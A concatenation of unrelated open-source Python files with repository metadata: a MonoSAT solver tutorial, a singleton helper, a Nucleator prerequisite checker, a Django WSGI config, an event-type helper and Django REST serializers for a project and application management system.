print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value()))
else:
print("UNSAT (under the assumption that 'b' is False)")
### Theory Support
# Now, onto the interesting stuff.
# In addition to Boolean logic, MonoSAT supports an extensive theory of finite graphs, including
# support for many common graph predicates such as reachability, shortest paths, maximum flows, acyclicity, and
# minimum spanning trees.
# MonoSAT also has support for BitVectors and Cardinality/Pseudo-Boolean constraints.
#Constructing a graph in MonoSAT is as easy as:
g = Graph()
#Create three nodes
n0 = g.addNode()
n1 = g.addNode()
n2 = g.addNode()
#Add three directed edges to the graph.
#You can also create undirected edges, using g.addUndirectedEdge().
e0 = g.addEdge(n0,n1)
e1 = g.addEdge(n1,n2)
e2 = g.addEdge(n0,n2)
#e0, e1, and e2 are *symbolic edges*, meaning that the edge (n0,n1) is included in G if and only if the
#theory atom e0 is assigned to True by MonoSAT.
#You can use e0,e1, and e2 just like variables in MonoSAT, and in that way control which edges are in the graph
#using arbitrary Boolean logic:
AssertNand(e0,e1,e2) # This is logically equivalent to Assert(Not(And(e0,e1,e2)))
AssertOr(e0,e2)
#You can even mix these symbolic edge variables with other logic from MonoSAT
AssertImplies(c, e0)
#Once you have created a graph and some edges, you can assert graph properties about that graph.
#For example, you can assert that node n2 must be reachable from node n0, in g
Assert(g.reaches(n0,n2))
result = Solve()
if result:
print("SAT")
print("e0: " + str(e0.value()))
print("e1: " + str(e1.value()))
print("e2: " + str(e2.value()))
else:
print("UNSAT")
#Graph predicates are 'double sided', so you can also assert that they are false, in order to
#prevent one node from reaching another:
Assert(Not(g.reaches(n1,n0)))
#You can also mix graph predicates in with arbitrary logic, just like variables and edges
Assert(Or(~b, ~g.reaches(n0,n1)))
result = Solve()
if result:
print("SAT")
print("e0: " + str(e0.value()))
print("e1: " + str(e1.value()))
print("e2: " + str(e2.value()))
else:
print("UNSAT")
#Edges can also have weights, represented as fixed-width, bounded bitvectors.
#(By bounded bitvectors, we mean that every bitvector in MonoSAT is asserted to
#be in the range [0, Max], and can never overflow/underflow)
#create a bitvector of width 4
bv0 = BitVector(4)
bv1 = BitVector(4)
bv2 = BitVector(4)
# BitVectors support addition, subtraction, and comparisons, but do not yet directly support
# negative values (the bitvectors are unsigned).
Assert(bv0+bv1 <= 7)
Assert(bv0 + bv2 >= bv1)
Assert(bv0 >= 2)
result = Solve()
if result:
print("SAT")
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
else:
print("UNSAT")
#When creating an edge, you can use bitvectors (or Python ints) as edge weights (otherwise, by default, every edge has weight '1'):
#Create a new graph
g2 = Graph()
#Create three nodes
n4 = g2.addNode()
n5 = g2.addNode()
n6 = g2.addNode()
#Add three weighted edges to the graph
#Weights may be bitvectors, or integer constants.
e3 = g2.addEdge(n4,n5, bv0)
e4 = g2.addEdge(n5,n6, bv1)
e5 = g2.addEdge(n4,n6, bv2)
#MonoSAT supports several useful graph predicates in addition to reachability, including:
#Shortest path constraints:
#Assert that the distance from n0 to n2 is less or equal to 3 (edges have default weights of 1)
Assert(g2.distance_leq(n4,n6,3))
#You can also use BitVectors in the arguments of graph predicates:
bv3 = BitVector(4)
Assert(Not(g2.distance_lt(n4,n6,bv3)))
Assert(bv3 == (bv0 + bv1))
result = Solve()
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv3: " + str(bv3.value()))
else:
print("UNSAT")
#MonoSAT also features highly optimized support for maximum flow constraints, allowing for comparisons against either a python integer, or a bitvector:
Assert(g2.maxFlowGreaterOrEqualTo(n4,n6,3))
bv4 = BitVector(4)
Assert(g2.maxFlowGreaterOrEqualTo(n4,n6,bv4))
#Just like with reachability and distance constraints, these maximum flow predicates are two sided
#so you can assert that the maximum flow must be less than a given bitvector, or you can include the
#maximum flow predicate as part of arbitrary Boolean logic
Assert(Or(~c,~g2.maxFlowGreaterOrEqualTo(n4,n6,bv4+1)))
result = Solve()
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv4: " + str(bv4.value()))
else:
print("UNSAT")
result = Solve([bv4==4])
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv4: " + str(bv4.value()))
else:
print("UNSAT")
result = Solve([bv4>4, bv4<7])
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv4: " + str(bv4.value()))
else:
print("UNSAT")
#MonoSAT also features good support for minimum spanning tree constraints (in undirected graphs):
g3 = Graph()
n7 = g3.addNode()
n8 = g3.addNode()
n9 = g3.addNode()
#Add three weighted, undirected edges to the graph
e6 = g3.addUndirectedEdge(n7,n8, 1)
e7 = g3.addUndirectedEdge(n8,n9, 2)
e8 = g3.addUndirectedEdge(n7,n9, 4)
Assert(g3.minimumSpanningTreeLessEq(3))
Assert(~g3.minimumSpanningTreeLessEq(1))
result = Solve()
if result:
print("SAT")
print("e6: " + str(e6.value()))
print("e7: " + str(e7.value()))
print("e8: " + str(e8.value()))
else:
print("UNSAT")
#(Minimum spanning tree constraints don't support bitvectors yet, but they could in the future)
|
{
"content_hash": "33a86f922248d24b647f65abae4952cf",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 151,
"avg_line_length": 29.762237762237763,
"alnum_prop": 0.6846804511278195,
"repo_name": "sambayless/monosat",
"id": "c769530fd1a86fe897b6f06cf5dd359b0786b5d9",
"size": "9019",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/python/tutorial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "33006"
},
{
"name": "C++",
"bytes": "3493499"
},
{
"name": "CMake",
"bytes": "25650"
},
{
"name": "Cython",
"bytes": "75137"
},
{
"name": "Java",
"bytes": "423109"
},
{
"name": "Python",
"bytes": "269148"
},
{
"name": "Scala",
"bytes": "3262"
}
],
"symlink_target": ""
}
|
"""
Singleton implementation.
Usage:
class A(singleton.Singleton): pass
Please NOTE:
id(A.Instance()), id(A))
"""
__copyright__ = '2013, Room 77, Inc.'
__author__ = 'Pramod Gupta'
import threading
# with_metaclass method from Six compatibility library.
# https://github.com/benjaminp/six/blob/1.11.0/six.py#L819
def with_metaclass(meta, *bases):
class metaclass(type):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
@classmethod
def __prepare__(cls, name, this_bases):
return meta.__prepare__(name, bases)
return type.__new__(metaclass, 'temporary_class', (), {})
class SingletonException(Exception):
pass
class _SingletonMeta(type):
def __new__(cls, name, bases, dct):
if '__new__' in dct:
raise SingletonException('Can not override __new__ in a Singleton')
return super(_SingletonMeta, cls).__new__(cls, name, bases, dct)
def __call__(cls, *args, **dictArgs):
raise SingletonException('Singletons may only be instantiated through Instance()')
class Singleton(with_metaclass(_SingletonMeta, object)):
_lock = threading.RLock()
@classmethod
def Instance(cls, *args, **kw):
"""
Call this to instantiate an instance or retrieve the existing instance.
If the singleton requires args to be instantiated, include them the first
time you call Instance.
"""
if not cls.Instantiated(): Singleton._createSingletonInstance(cls, args, kw)
return cls._instance
@classmethod
def Instantiated(cls):
# Don't use hasattr(cls, '_instance'), because that screws things up if there is a singleton
# that extends another singleton.
# hasattr looks in the base class if it doesn't find in subclass.
return '_instance' in cls.__dict__
@staticmethod
def _createSingletonInstance(cls, args, kw):
with Singleton._lock:
# Check if the the class really needs to be instantiated.
if cls.Instantiated(): return
try:
# Create the new instance and init it.
instance = cls.__new__(cls)
instance.__init__(*args, **kw)
except TypeError as e:
if e.message.find('__init__() takes') != -1:
raise SingletonException('If the singleton requires __init__ args, '
'supply them on first call to Instance().')
else:
raise e
cls._instance = instance
|
{
"content_hash": "5120e6440a3df02d7557dd49da461d14",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 98,
"avg_line_length": 29.875,
"alnum_prop": 0.6485355648535565,
"repo_name": "room77/py77",
"id": "4a36a5b6a19e534e69b5d8f4a1d69e23adfd1153",
"size": "2390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pylib/util/singleton.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1511"
},
{
"name": "Python",
"bytes": "376037"
},
{
"name": "Shell",
"bytes": "9092"
}
],
"symlink_target": ""
}
|
from nucleator.cli.command import Command
from nucleator.cli import utils
from nucleator.cli import ansible
from nucleator.cli import properties
from distutils.version import StrictVersion
import os, subprocess
class Init(Command):
name = "init"
def parser_init(self, subparsers):
"""
Initialize parsers for this command.
"""
init_parser = subparsers.add_parser('init')
def init(self, **kwargs):
"""
This command initializes your nucleator configuration:
- Initializes and populates a .nucleator configuration directory in user's home
directory with sample Customer, Account and Cage configs
- Places initial manifest of versioned nucleator Cage and Stackset Modules with
repo sources in nucleator configuration directory
- Populates an initial rolespec directory with Role definitions required for use
of nucleator modules
- Validates nucleator pre-requisites (ansible, aws) and provides installation
instructions if missing
"""
self.check_prerequisites()
cli=kwargs.get("cli", None)
if cli is None:
raise ValueError("INTERNAL ERROR: cli should have been set by upstream code, but is not specified")
extra_vars={
"verbosity": kwargs.get("verbosity", None),
"debug_credentials": kwargs.get("debug_credentials", None),
"nucleator_dynamic_hosts_src": properties.DYNAMIC_HOSTS_SRC,
"nucleator_dynamic_hosts_dest": properties.DYNAMIC_HOSTS_PATH,
}
return cli.safe_playbook(
self.get_command_playbook("init.yml"),
is_static="Bootstrap",
**extra_vars
)
def check_prerequisites(self):
"""Check that nucleator pre-requisites are in place"""
# graffiti monkey
utils.write("\nChecking graffiti monkey installation...\n")
try:
import graffiti_monkey
from graffiti_monkey.core import GraffitiMonkey
no_graffiti_monkey=False
except ImportError:
no_graffiti_monkey=True
msg="Prerequisite graffiti_monkey not found.\nNucleator requires graffiti_monkey to run. " \
"You can install it via:\n" \
"\tpip install graffiti_monkey==0.7"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# paramiko
utils.write("\nChecking paramiko installation...\n")
try:
import paramiko
no_paramiko=False
except ImportError:
no_paramiko=True
msg="Prerequisite paramiko not found.\nNucleator requires paramiko to run. " \
"You can install it via:\n" \
"\tpip install paramiko"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# pyyaml
utils.write("\nChecking pyyaml installation...\n")
try:
import yaml
no_yaml=False
except ImportError:
no_yaml=True
msg="Prerequisite pyyaml not found.\nNucleator requires pyyaml to run. " \
"You can install it via:\n" \
"\tpip install pyyaml"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# jinja2
utils.write("\nChecking jinja2 installation...\n")
try:
import jinja2
no_jinja2=False
except ImportError:
no_jinja2=True
msg="Prerequisite jinja2 not found.\nNucleator requires jinja2 to run. " \
"You can install it via:\n" \
"\tpip install jinja2"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# ansible
utils.write("\nChecking ansible Installation\n")
try:
utils.write(subprocess.check_output(["ansible-playbook", "--version"]))
no_ansible=False
except OSError:
no_ansible=True
if no_ansible:
msg="Prerequisite ansible not found.\nNucleator requires ansible to run. " \
"You can install it with all 47Lining pull requests via:\n" \
"\tgit clone --recursive --depth 1 -b nucleator_distribution https://github.com/47lining/ansible.git\n" \
"\tcd ansible; sudo python setup.py install"
utils.write_err(msg, False)
# aws CLI
utils.write("\nChecking aws CLI installation...\n")
try:
utils.write(subprocess.check_output(["aws", "--version"]))
no_aws=False
except OSError:
no_aws=True
if no_aws:
msg="Prerequisite aws not found.\nNucleator requires aws to run. " \
"You can install it via:\n" \
"\tpip install awscli"
utils.write_err(msg, False)
# httplib2
utils.write("\nChecking httplib2 installation...\n")
try:
import httplib2
no_httplib2=False
except ImportError:
no_httplib2=True
msg="Prerequisite httplib2 not found.\nNucleator requires httplib2 to run. " \
"You can install it via:\n" \
"\tpip install httplib2"
utils.write_err(msg, False)
# winrm
utils.write("\nChecking winrm installation...\n")
try:
from winrm import Response
from winrm.exceptions import WinRMTransportError
from winrm.protocol import Protocol
except ImportError:
msg="Prerequisite winrm not found.\nNucleator requires winrm to run when configuring Windows instances. Ignore this if you are not using any Windows instances. " \
"You can install it via:\n" \
"\tpip install pywinrm"
utils.write(msg)
# boto
utils.write("\nChecking boto installation...\n")
try:
import boto
utils.write(boto.Version + "\n")
no_boto=False
if not StrictVersion(boto.Version) >= StrictVersion('2.38.0'):
msg="Prerequisite boto not up to date.\nNucleator requires boto version 2.38.0 or greater to run. " \
"You can install it via:\n" \
"\tpip install boto"
utils.write_err(msg, False)
no_boto = True
except ImportError:
no_boto=True
msg="Prerequisite boto not found.\nNucleator requires boto to run. " \
"You can install it via:\n" \
"\tpip install boto"
utils.write_err(msg, False)
if no_ansible or no_aws or no_boto or no_paramiko or no_yaml or no_jinja2 or no_httplib2:
utils.write_err("Missing pre-requisite, exiting")
# Create the singleton for auto-discovery
command = Init()
|
{
"content_hash": "5f7f29cf34dec41e564fbfc9a0236285",
"timestamp": "",
"source": "github",
"line_count": 189,
"max_line_length": 175,
"avg_line_length": 37.74074074074074,
"alnum_prop": 0.5806813402495443,
"repo_name": "47lining/nucleator-core",
"id": "698fb730c725bf20ea1c8bb261d23fc7a279cda8",
"size": "7711",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/nucleator/core/init/commands/init.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "159399"
},
{
"name": "Ruby",
"bytes": "3268"
}
],
"symlink_target": ""
}
|
"""
WSGI config for newdjangosite project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "newdjangosite.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "newdjangosite.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
{
"content_hash": "501845d1daccebdbc8c21e8e77967098",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 79,
"avg_line_length": 45,
"alnum_prop": 0.7958333333333333,
"repo_name": "kbarnes3/BaseDjangoSite",
"id": "e02d1ac5dcf9ed7878ebb9fbdfb2a50c8164de95",
"size": "1440",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/newdjangosite/wsgi.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "1184"
},
{
"name": "HTML",
"bytes": "9955"
},
{
"name": "PowerShell",
"bytes": "5583"
},
{
"name": "Python",
"bytes": "42152"
},
{
"name": "Shell",
"bytes": "1090"
}
],
"symlink_target": ""
}
|
from django.conf import settings
class EventType:
"""
Helper class to define types of events. See .model.Event.type.
"""
def __init__(self, db_value, human_readable_value,
human_readable_value_plural=None,
css_class_name_suffix='primary'):
self.db_value = db_value
self.human_readable_value = human_readable_value
self.human_readable_value_plural = (
human_readable_value_plural or human_readable_value + 's')
self.css_class_name = 'event-{}'.format(css_class_name_suffix)
@property
def choices(self):
"""
Returns a tuple that can be used for Django model field choices
entries.
"""
return self.db_value, self.human_readable_value
@property
def data(self):
return {
'db_value': self.db_value,
'human_readable_value': self.human_readable_value,
'human_readable_value_plural': self.human_readable_value_plural,
'css_class_name': self.css_class_name,
}
@classmethod
def get_all(self):
"""
Returns an iterable of all event types that are configured in the
settings (EVENT_TYPES). The result can be used in the API.
"""
return (event_type.data for event_type in settings.EVENT_TYPES)
@classmethod
def get_all_choices(cls):
"""
Returns an iterable of all event types that are configured in the
settings (EVENT_TYPES). The result can be used for Django model
field choices.
"""
return (event_type.choices for event_type in settings.EVENT_TYPES)
|
{
"content_hash": "88a5567f4fb0e94421d0d34146c6fbf2",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 76,
"avg_line_length": 33.91836734693877,
"alnum_prop": 0.6089049338146811,
"repo_name": "normanjaeckel/DreifaltigkeitHomepage",
"id": "8ff03cbc58a0277a7fcaf19aaa24807ddbca3453",
"size": "1662",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dreifaltigkeithomepage/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "902"
},
{
"name": "CoffeeScript",
"bytes": "14118"
},
{
"name": "HTML",
"bytes": "5329"
},
{
"name": "JavaScript",
"bytes": "641"
},
{
"name": "Python",
"bytes": "29040"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from collections import defaultdict
from datetime import datetime, date
from django.db import transaction
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from rest_framework.fields import CurrentUserDefault
from account.models import User
from account.serializers import IDUserSerializer, BasicUserSerializer
from agency.agencies import UNHCR
from agency.serializers import AgencySerializer, AgencyUserListSerializer
from common.consts import (
APPLICATION_STATUSES,
CFEI_TYPES,
CFEI_STATUSES,
DIRECT_SELECTION_SOURCE,
COMPLETED_REASON,
ALL_COMPLETED_REASONS,
OTHER_AGENCIES_DSR_COMPLETED_REASONS,
UNHCR_DSR_COMPLETED_REASONS,
)
from common.utils import get_countries_code_from_queryset, update_m2m_relation
from common.serializers import (
SimpleSpecializationSerializer,
PointSerializer,
CommonFileSerializer,
MixinPreventManyCommonFile,
)
from common.models import Point, Specialization
from notification.consts import NotificationType
from notification.helpers import user_received_notification_recently, send_notification_to_cfei_focal_points
from partner.serializers import PartnerSerializer, PartnerAdditionalSerializer, PartnerShortSerializer, \
PartnerSimpleSerializer
from partner.models import Partner
from project.identifiers import get_eoi_display_identifier
from project.models import EOI, Application, Assessment, ApplicationFeedback, EOIAttachment, \
ClarificationRequestQuestion, ClarificationRequestAnswerFile
from project.utilities import update_cfei_focal_points, update_cfei_reviewers
class EOIAttachmentSerializer(serializers.ModelSerializer):
created_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
file = CommonFileSerializer()
class Meta:
model = EOIAttachment
fields = (
'id',
'created_by',
'description',
'file',
)
class BaseProjectSerializer(serializers.ModelSerializer):
specializations = SimpleSpecializationSerializer(many=True)
agency = AgencySerializer()
created = serializers.SerializerMethodField()
country_code = serializers.SerializerMethodField()
focal_points = BasicUserSerializer(read_only=True, many=True)
class Meta:
model = EOI
fields = (
'id',
'displayID',
'title',
'created',
'country_code',
'specializations',
'agency',
'start_date',
'end_date',
'deadline_date',
'status',
'completed_date',
'focal_points',
)
def get_created(self, obj):
return obj.created.date()
def get_country_code(self, obj):
return get_countries_code_from_queryset(obj.locations)
class ApplicationsPartnerStatusSerializer(serializers.ModelSerializer):
legal_name = serializers.CharField(source="partner.legal_name")
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'legal_name',
'partner_additional',
'application_status',
'application_status_display',
)
class DirectProjectSerializer(BaseProjectSerializer):
invited_partners = serializers.SerializerMethodField()
partner_offer_status = serializers.SerializerMethodField()
selected_source_display = serializers.CharField(source='get_selected_source_display', read_only=True)
class Meta:
model = EOI
fields = (
'id',
'title',
'created',
'country_code',
'specializations',
'agency',
'invited_partners',
'start_date',
'end_date',
'deadline_date',
'status',
'selected_source',
'selected_source_display',
'partner_offer_status',
)
def get_invited_partners(self, obj):
return obj.invited_partners.values_list('legal_name', flat=True)
def get_partner_offer_status(self, obj):
queryset = Application.objects.filter(eoi=obj)
return ApplicationsPartnerStatusSerializer(queryset, many=True).data
class CreateEOISerializer(serializers.ModelSerializer):
locations = PointSerializer(many=True)
attachments = EOIAttachmentSerializer(many=True, required=False)
def validate(self, attrs):
validated_data = super(CreateEOISerializer, self).validate(attrs)
date_field_names_that_should_be_in_this_order = [
'clarification_request_deadline_date',
'deadline_date',
'notif_results_date',
'start_date',
'end_date',
]
dates = []
for field_name in date_field_names_that_should_be_in_this_order:
dates.append(validated_data.get(field_name))
dates = list(filter(None, dates))
if not dates == sorted(dates):
raise serializers.ValidationError('Dates for the project are invalid.')
today = date.today()
if not all([d >= today for d in dates]):
raise serializers.ValidationError('Dates for the project cannot be set in the past.')
validated_data['displayID'] = get_eoi_display_identifier(
validated_data['agency'].name, validated_data['locations'][0]['admin_level_1']['country_code']
)
if len(validated_data.get('attachments', [])) > 5:
raise serializers.ValidationError({
'attachments': 'Maximum of 5 attachments is allowed.'
})
return validated_data
class Meta:
model = EOI
exclude = ('cn_template', )
extra_kwargs = {
'clarification_request_deadline_date': {
'required': True,
},
'deadline_date': {
'required': True,
},
'notif_results_date': {
'required': True,
},
}
class CreateDirectEOISerializer(CreateEOISerializer):
class Meta:
model = EOI
exclude = ('cn_template', 'deadline_date', 'clarification_request_deadline_date')
class CreateDirectApplicationSerializer(serializers.ModelSerializer):
class Meta:
model = Application
exclude = ("cn", "eoi", "agency", "submitter")
def validate_partner(self, partner):
if partner.is_hq:
raise ValidationError('HQs of International partners are not eligible for Direct Selections / Retention.')
if partner.is_locked:
raise ValidationError('Partner account has been locked and is no longer eligible for selection.')
if partner.has_red_flag:
raise ValidationError('Partner accounts with red flags are not eligible for selection.')
return partner
class CreateDirectApplicationNoCNSerializer(CreateDirectApplicationSerializer):
class Meta:
model = Application
exclude = ("cn", )
read_only_fields = ('submitter', 'eoi', 'agency',)
class ApplicationPartnerSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ('id', 'cn', 'created')
class ProposalEOIDetailsSerializer(serializers.Serializer):
specializations = serializers.SerializerMethodField()
title = serializers.CharField()
def get_specializations(self, obj):
return SimpleSpecializationSerializer(
Specialization.objects.filter(id__in=obj.get('specializations')), many=True
).data
class PartnerApplicationSerializer(MixinPreventManyCommonFile, serializers.ModelSerializer):
cn = CommonFileSerializer()
agency = AgencySerializer(read_only=True)
decision_date = serializers.DateField(source='partner_decision_date', read_only=True)
proposal_of_eoi_details = ProposalEOIDetailsSerializer(read_only=True)
locations_proposal_of_eoi = PointSerializer(many=True, read_only=True)
class Meta:
model = Application
editable_fields = (
'did_accept',
'did_decline',
'cn',
)
read_only_fields = (
'id',
'status',
'created',
'agency',
'did_win',
'did_withdraw',
'decision_date',
'is_published',
'published_timestamp',
'cfei_type',
'application_status',
'application_status_display',
'proposal_of_eoi_details',
'locations_proposal_of_eoi',
'is_unsolicited',
)
fields = editable_fields + read_only_fields
prevent_keys = ["cn"]
class ApplicationFullSerializer(serializers.ModelSerializer):
cn = CommonFileSerializer()
eoi_id = serializers.IntegerField(write_only=True)
partner = PartnerSerializer(read_only=True)
agency = AgencySerializer(read_only=True)
proposal_of_eoi_details = ProposalEOIDetailsSerializer(read_only=True)
locations_proposal_of_eoi = PointSerializer(many=True, read_only=True)
submitter = BasicUserSerializer(read_only=True, default=serializers.CurrentUserDefault())
is_direct = serializers.SerializerMethodField()
cfei_type = serializers.CharField(read_only=True)
application_status = serializers.CharField(read_only=True)
application_status_display = serializers.CharField(read_only=True)
assessments_is_completed = serializers.NullBooleanField(read_only=True)
assessments_marked_as_completed = serializers.NullBooleanField(read_only=True)
decision_date = serializers.DateField(source='partner_decision_date', read_only=True)
agency_decision_maker = BasicUserSerializer(read_only=True)
partner_decision_maker = BasicUserSerializer(read_only=True)
class Meta:
model = Application
exclude = (
'accept_notification',
)
read_only_fields = (
'cn',
'eoi',
'agency_decision_date',
'partner_decision_date',
'did_accept',
'did_decline',
)
def get_is_direct(self, obj):
return obj.eoi_converted is not None
def validate(self, data):
if isinstance(self.instance, Application):
app = self.instance
allowed_to_modify_status = list(app.eoi.focal_points.values_list('id', flat=True)) + [app.eoi.created_by_id]
if data.get("status") and self.context['request'].user.id not in allowed_to_modify_status:
raise serializers.ValidationError(
"Only Focal Point/Creator is allowed to pre-select/reject an application."
)
if data.get("status") == APPLICATION_STATUSES.rejected and \
Assessment.objects.filter(application=app).exists():
raise serializers.ValidationError("Since assessment has begun, application can't be rejected.")
if data.get("status") == APPLICATION_STATUSES.recommended:
if not app.status == APPLICATION_STATUSES.preselected:
raise serializers.ValidationError('Only Preselected applications can be recommended.')
if not app.assessments_is_completed:
raise serializers.ValidationError(
'Cannot recommend application before all assessments have been completed.'
)
if app.eoi.is_completed:
raise serializers.ValidationError("Since CFEI is completed, modification is forbidden.")
if data.get("did_win"):
if not app.eoi.review_summary_comment:
raise serializers.ValidationError({
'review_summary_comment': 'Review summary needs to be filled in before picking a winner.'
})
if not app.partner.is_verified:
raise serializers.ValidationError(
"You cannot award an application if the profile has not been verified yet."
)
if app.partner.has_red_flag:
raise serializers.ValidationError("You cannot award an application if the profile has red flag.")
if not app.assessments_is_completed:
raise serializers.ValidationError(
"You cannot award an application if all assessments have not been added for the application."
)
return super(ApplicationFullSerializer, self).validate(data)
def update(self, instance, validated_data):
if 'status' in validated_data:
with transaction.atomic():
eoi = EOI.objects.select_for_update().get(pk=instance.eoi_id)
preselected_partners = set(eoi.preselected_partners)
if validated_data['status'] in {APPLICATION_STATUSES.preselected, APPLICATION_STATUSES.recommended}:
preselected_partners.add(instance.partner_id)
else:
preselected_partners.discard(instance.partner_id)
eoi.preselected_partners = list(preselected_partners)
eoi.save()
return super(ApplicationFullSerializer, self).update(instance, validated_data)
class ApplicationFullEOISerializer(ApplicationFullSerializer):
eoi = BaseProjectSerializer(read_only=True)
eoi_applications_count = serializers.SerializerMethodField(allow_null=True, read_only=True)
def get_eoi_applications_count(self, application):
return application.eoi and application.eoi.applications.count()
class ManageUCNSerializer(MixinPreventManyCommonFile, serializers.Serializer):
id = serializers.CharField(source="pk", read_only=True)
locations = PointSerializer(many=True, source='locations_proposal_of_eoi')
title = serializers.CharField(source='proposal_of_eoi_details.title')
agency = serializers.CharField(source='agency.id')
specializations = serializers.ListField(source='proposal_of_eoi_details.specializations')
cn = CommonFileSerializer()
prevent_keys = ["cn"]
@transaction.atomic
def create(self, validated_data):
self.prevent_many_common_file_validator(validated_data)
partner = self.context['request'].active_partner
locations = validated_data.pop('locations_proposal_of_eoi', [])
agency = validated_data.pop('agency')
app = Application.objects.create(
is_unsolicited=True,
is_published=False,
partner_id=partner.id,
eoi=None,
agency_id=agency['id'],
submitter=self.context['request'].user,
status=APPLICATION_STATUSES.pending,
proposal_of_eoi_details=validated_data['proposal_of_eoi_details'],
cn=validated_data['cn'],
)
for location in locations:
point = Point.objects.get_point(**location)
app.locations_proposal_of_eoi.add(point)
return app
@transaction.atomic
def update(self, instance, validated_data):
self.prevent_many_common_file_validator(validated_data)
instance.agency_id = validated_data.get('agency', {}).get('id') or instance.agency_id
instance.proposal_of_eoi_details = validated_data.get(
'proposal_of_eoi_details'
) or instance.proposal_of_eoi_details
instance.cn = validated_data.get('cn') or instance.cn
locations_data = self.initial_data.get('locations', [])
if locations_data:
instance.locations_proposal_of_eoi.clear()
for location_data in locations_data:
location_serializer = PointSerializer(data=location_data)
location_serializer.is_valid(raise_exception=True)
instance.locations_proposal_of_eoi.add(location_serializer.save())
instance.save()
return instance
class CreateDirectProjectSerializer(serializers.Serializer):
eoi = CreateDirectEOISerializer()
applications = CreateDirectApplicationNoCNSerializer(many=True)
def validate(self, attrs):
validated_data = super(CreateDirectProjectSerializer, self).validate(attrs)
if len(validated_data['applications']) > 1:
raise serializers.ValidationError({
'applications': 'Only one application is allowed for DSR'
})
return validated_data
@transaction.atomic
def create(self, validated_data):
locations = validated_data['eoi'].pop('locations')
specializations = validated_data['eoi'].pop('specializations')
focal_points = validated_data['eoi'].pop('focal_points')
attachments = validated_data['eoi'].pop('attachments', [])
validated_data['eoi']['display_type'] = CFEI_TYPES.direct
eoi = EOI.objects.create(**validated_data['eoi'])
for location in locations:
point = Point.objects.get_point(**location)
eoi.locations.add(point)
for specialization in specializations:
eoi.specializations.add(specialization)
for attachment_data in attachments:
attachment_data['eoi'] = eoi
EOIAttachment.objects.create(**attachment_data)
applications = []
for application_data in validated_data['applications']:
application = Application.objects.create(
partner=application_data['partner'],
eoi=eoi,
agency=eoi.agency,
submitter=validated_data['eoi']['created_by'],
status=APPLICATION_STATUSES.pending,
did_win=True,
ds_justification_select=application_data['ds_justification_select'],
justification_reason=application_data['justification_reason'],
ds_attachment=application_data.get('ds_attachment'),
)
applications.append(application)
update_cfei_focal_points(eoi, [f.id for f in focal_points])
return {
"eoi": eoi,
"applications": applications,
}
class CreateProjectSerializer(CreateEOISerializer):
class Meta(CreateEOISerializer.Meta):
model = EOI
exclude = CreateEOISerializer.Meta.exclude + (
'created_by',
)
@transaction.atomic
def create(self, validated_data):
locations = validated_data.pop('locations')
specializations = validated_data.pop('specializations')
focal_points = validated_data.pop('focal_points')
attachments = validated_data.pop('attachments', [])
